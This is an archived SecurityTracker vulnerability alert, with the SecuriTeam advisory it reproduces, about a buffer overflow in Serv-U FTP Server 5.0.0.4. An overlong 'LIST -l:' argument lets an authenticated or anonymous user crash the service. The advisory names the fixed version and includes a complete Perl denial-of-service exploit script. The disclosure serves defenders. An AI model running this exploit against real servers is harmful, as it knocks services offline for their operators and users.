SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (File Transfer/Sharing)  >   FTP Serv-U Vendors:   RhinoSoft.com
Serv-U FTP Server LIST '-l:' Buffer Overflow Lets Remote Authenticated Users Crash the FTP Service
SecurityTracker Alert ID:  1009869
SecurityTracker URL:  http://securitytracker.com/id/1009869
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 19 2004
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 5.0.0.4 and prior versions
Description:   A buffer overflow vulnerability was reported in the Serv-U FTP server in the processing of the LIST '-l:' parameter. A remote authenticated user can cause the FTP service to crash.

SecuriTeam reported that a remote authenticated user, including an anonymous user, can supply a specially crafted value for a 'LIST -l:' command of about 134 bytes to trigger a memory access error and cause the FTP service to crash.

A demonstration exploit is provided in the Source Message.

STORM is credited with discovering this flaw.
Impact:   A remote user can cause the FTP service to crash.
Solution:   The vendor has released a fixed version (5.0.0.6), available at:

http://www.serv-u.com/customer/record.asp?prod=su

[Editor's note: At the time of this entry, the various Serv-U web site domain addresses were not available via DNS.]
Vendor URL:  www.serv-u.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:   Windows (Any)

Message History:   None.

 Source Message Contents
Date:  19 Apr 2004 18:15:57 +0200
Subject:  [NT] Serv-U LIST -l Parameter Buffer Overflow


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Serv-U LIST -l Parameter Buffer Overflow
------------------------------------------------------------------------


SUMMARY

 <http://www.serv-u.com/> Serv-U is a "powerful, easy-to-use, 
award-winning FTP server" created by Rob Beckers. A vulnerability in the 
product allows a remote user to cause the server to fail by sending a 
malformed LIST command to the server.

DETAILS

Vulnerable Systems:
 * Serv-U version 5.0.0.4 and prior

Immune Systems:
 * Serv-U 5.0.0.6 and newer

A user issuing a long parameter (around 134 bytes) as a value for a LIST 
command (using the -l: parameter for that LIST command), can cause the 
server to try and read a value that is outside the memory location of the 
Serv-U's memory, this will cause an exception to be triggered (an 
unhandled exception), which in turn causes the program to crash.

Exploit:
#!/usr/bin/perl

use IO::Socket;

$host = "192.168.1.243";

$remote = IO::Socket::INET->new ( Proto => "tcp",
     PeerAddr => $host,
     PeerPort => "2116",
    );

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}

$remote->autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join("", "PASS ", "a\@b.com", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

my $ftp = join ("", "LIST -l:", "A"x(134), "\r\n");

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;


ADDITIONAL INFORMATION

SecurITeam would like to thank  <mailto:storm@securiteam.com> STORM for 
finding this vulnerability. 



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business
 profits or special damages.


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC